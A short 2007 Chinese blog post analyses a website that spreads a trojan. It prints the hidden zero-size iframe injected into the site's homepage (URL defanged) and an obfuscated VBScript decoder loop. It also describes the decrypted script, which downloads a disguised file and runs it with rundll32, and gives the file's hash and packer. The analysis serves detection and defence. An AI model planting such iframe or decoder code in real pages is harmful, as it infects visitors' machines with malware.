一个传播Trojan.Win32.Agent.aac的网站

endurer 原创

2007-03-08 第1版

网站首页包含代码：
/---
＜iframe src="hxxp://2007.ads***3721.com/0*2**0***1.htm" width="0" height="0"＞＜/iframe＞
---/

hxxp://2007.ads***3721.com/0*2**0***1.htm

Kaspersky 报为 Trojan-Downloader.VBS.Small.dv，其中包含VBScript程序，功能是解密变量a的值并执行。

相关代码为：
/---
D＝＂EXECUTE ＂＂＂＂＂：C＝＂&CHR（&H＂：N＝＂）＂：DO WHILE LEN（a）＞1：D＝D&C&LEFT（a，2）&＂－2＂&N：b＝a：a＝MID（b，3）：LOOP：execute D
---/

重复5次解密过程，得到一段VBScript程序，功能是利用 Microsoft.XMLHTTP 和
scrīpting.FileSystemObject 下载文件 boy.jpg，保存为 %temp%/h1.bmp，并利用Shell.Application 对象Q 的 ShellExecute 方法 运行："rundll32.exe",%temp%/h1.bmp,"","open",0

文件说明符 : D:/test/boy.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-8 12:43:41
修改时间 : 2007-3-8 12:44:34
访问时间 : 2007-3-8 12:45:19
大小 : 42856 字节 41.872 KB
MD5 : 845989a7edc5527a88e0cb917525171e

采用 nSPack 1.3 -> North Star/Liu Xing Ping　加壳。
Kaspersky 报为 Trojan.Win32.Agent.aac

 

后记：

昨天发现一个调用 cmd.exe 来运行的：

发现一个传播威金/Worm.Win32.Viking.if的网站，用的技术很新颖
http://endurer.bokee.com/6147701.html
http://blog.sina.com/u/49926d91010007ur
http://blog.i0778.com/?1314/action_viewspace_itemid_2643.html

 

今天又遇到一个调用 rundll32.exe 来运行的。